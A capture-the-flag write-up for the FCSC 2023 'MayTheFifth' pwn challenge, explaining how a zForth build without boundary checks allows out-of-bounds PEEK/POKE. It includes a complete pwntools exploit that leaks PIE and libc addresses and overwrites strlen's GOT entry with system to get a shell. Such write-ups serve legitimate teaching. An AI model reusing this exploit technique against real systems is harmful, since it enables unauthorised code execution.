[FCSC 2023] Pwn - MayTheFifth

6 minute read

Challenge Description


ZForth is an open-source implementation of Forth. It is designed to run on embedded systems and to be very lightweight. [wikipédia]


We are given a few files: core.zf that contains the dictionnary of instructions, ld-2.31.so the linker used in remote, libc-2.31.so the libc used in remote, libm-2.31.so the math library used in remote, zforth the binary of the challenge and finally zforth-src.tar.gz which contains all the files needed for compilation and the vulnerable configuration.

My Setup

For this challenge I used: - Pwndbg to debug -> https://github.com/pwndbg/pwndbg - Pwntools to script -> https://docs.pwntools.com/en/stable/

There were no needs for a decompiler because we had the source code 
of the file.

Vulnerability explanation

In the archive zforth-src.tar.gz there is a file named “tell.patch” that contains the modification made to the original configuration of Zforth.

I am not going to describe the whole file but the most important part is this one:


Debugging the dictionary

zForth provides useful PEEK and POKE primitives, used when inspecting bytes inside the dictionary (“dict”), typically for debugging purposes. The PEEK command is very simple: first enter the offset inside the dictionary followed by the size of the data to be read, typically 4 and the ‘@@’ keyword (defined in core.zf):

143 4 @@ .
309357920 

Similarly, POKE allows you to directly modify data inside the dictionary, this time the data to be written is first, followed by the offset and the size, and then ‘!!':

20204 143 3 !!
143 3 @@ .
20204

Please be very careful when using PEEK and POKE. They are very powerful commands, and their use can lead to undefined behaviour!


We also know that for performance purposes ASAN, ZF_ENABLE_BOUNDARY_CHECKS and setjmp/longjmp were disabled.

ZF_ENABLE_BOUNDARY_CHECKS being in charge of checking that the PEEK and POKE syscalls are not doing modification/reading outside of the dict variable basically means that we have a relative read and write on the binary’s memory.

How could this be useful ?

We could use that to leak the memory of the binary and therefore defeat the ASLR (Address Space Layout Randomization) and PIE (Position Independant Execution) and then overwrite the GOT (Global Offset Table) entry of a function and call another one.

Defeating ASLR and PIE

To leak memory, I used the PEEK syscall that is supposed to be used to show the dictionnary of instructions of ZForth.

Basically it reads the memory like that:

1(pseudo code)
2
3function peek(offset, len){
4    write(1, *dict+offset, len)    
5}

It means that if we give to peek an offset that is less than 0 we can read memory outside of dict and same thing happens if we give to peek an offset that is bigger than 4096.

If we want to read/write to an arbitrary memory we first need to find out the address of dict so that we can deduce the result of dict+offset. To do that, I first tried to find a place in the memory that points to dict. I found a pointer 300 bytes beneath dict leaking its addresses. We now have the addresses of dict and we can also find the base_address of the binary, even if the addresses are random, the offsets stay the same. By doing a simple subtraction we can deduce that the base of the binary is 24992 beneath the addr of dict. So now when we leak dict, we also have the base address of the binary.

With all of this, we can leak the LIBC base address because in the binary, because in the GOT, each entry of a function points to the address of the same function in the LIBC.

As an example, the GOT entry of the function printf points to the address of the function printf in the LIBC.

To leak this, I made a very simple function that calculates the input needed to leak the content of an arbitrary address:

 1
 2def read_primitive(base_addr, addr, length):
 3    """
 4    > 143 4 @@ .
 5    > 309357920
 6    """
 7    
 8    payload = "%i %i @@ ." % (addr-base_addr, length)
 9    return payload
10
11
12leak = p.sendline(read_primitive(leak_base, printf_got, 4))
13print(hex(int(leak.encode(),0))) # -> 0xf4b89000 (for example)
14

With all of this in hand, we now have every elements to have a shell and get the flag.

Popping a shell

It actually took me a lot of time to finish this step because I did nppt read the code well and I lost a lot of time with weird errors.

To spawn our shell, I decided to overwrite an entry in the GOT with a pointer but for reasons I still do not understand, the function that I built to write content at arbitrary addresses was not precise at all so it was impossible to just overwrite an entry in the GOT with a one gadget (piece of code in the gLIBC that spawns a shell) so I had to find a place in the code of ZForth where a function in the GOT is called with only one argument which I need to control.

At a certain point, I tried to overwrite the entry of printf and it was spawning a shell but then it was executing the commmand “zf_abort::” which is obviously not a valid command so it was crashing.

I ended up choosing this snippet of code:

 1/*
 2 * Find word in dictionary, returning address and execution token
 3 */
 4
 5static int find_word(const char *name, zf_addr *word, zf_addr *code)
 6{
 7	zf_addr w = LATEST;
 8	size_t namelen = strlen(name);
 9
10	while(w) {
11		zf_cell link, d;
12		zf_addr p = w;
13		size_t len;
14		p += dict_get_cell(p, &d);
15		p += dict_get_cell(p, &link);
16		len = ZF_FLAG_LEN((int)d);
17		if(len == namelen) {
18			const char *name2 = (const char *)&dict[p];
19			if(memcmp(name, name2, len) == 0) {
20				*word = w;
21				*code = p + len;
22				return 1;
23			}
24		}
25		w = link;
26	}
27
28	return 0;
29}

Because I control the first argument of strlen and this function can be called very easily (in fact every time a new line is sent in the interpretor, every word splitted by a space is passed into this function)

Summary of our exploit

  1. We leak the base address of the binary and the address of dict
  2. Using our earlier leaks, we leak the base address of the LIBC
  3. We overwrite the GOT entry of strlen and then we send /bin/bash to spawn our shell.
  4. Get the flag and stop cybersecurity

Poc

 1from pwn import *
 2
 3
 4elf = ELF('./zforth', checksec=False)
 5
 6libc = ELF("./libc-2.31.so", checksec=False)
 7
 8#p = process([elf.path, 'core.zf'])
 9p = remote("challenges.france-cybersecurity-challenge.fr",2107)
10p.recvline()
11
12
13
14def write_primitive(base_addr, content , addr, length):
15
16    """
17
18    > 20204 143 3 !!
19    > 143 3 @@ .
20    > 20204
21
22    """
23    payload = "%i %i %i !!" % (content, addr - base_addr, length)
24    return payload
25
26def read_primitive(base_addr, addr, length):
27    """
28    > 143 4 @@ .
29    > 309357920
30    """
31    
32    payload = "%i %i @@ ." % (addr-base_addr, length)
33    return payload
34
35
36# GET DICT ADDRESS AND BASE ADDR OF THE BINARY
37
38payload = b"-300 4 @@ ."
39p.sendline(payload)
40
41dict_address = int(p.recvline().strip(), 0)
42dict_address += 0x20
43
44info("DICT @%s" % hex(dict_address))
45
46elf.address = dict_address - 24992
47
48info("PIE  @%s" % hex(elf.address))
49
50# LEAK LIBC
51
52printf_got = elf.got['printf']
53
54payload = read_primitive(dict_address, printf_got, 4)
55p.sendline(payload.encode())
56
57printf_libc = int(p.recvline().strip(), 0)
58printf_libc += 0x20
59
60
61libc.address = printf_libc  - libc.sym['printf']
62
63
64info("LIBC  @%s" % hex(libc.address))
65  
66
67
68success("STAGE 1 COMPLETED.")
69
70
71system = libc.sym['system']
72strlen_got = elf.got['strlen']
73
74
75# Overwrite GOT
76
77
78payload = write_primitive(dict_address, system , strlen_got , 4)
79p.sendline(payload.encode())
80
81p.sendline(b"/bin/sh ouais_allo_c'est_greg")
82p.interactive()
83
84

Conclusion

This challenge was very interesting and it was the first time for me exploiting a “real” software (even if it was not the default configuration of it) so I felt like a genius. Huge thanks to cde (cde#1518 on discord) and \J (\J#8677 on discord) for this challenge :thumbsup:

If you have any questions feel free to send me a message on Discord: @numb3rss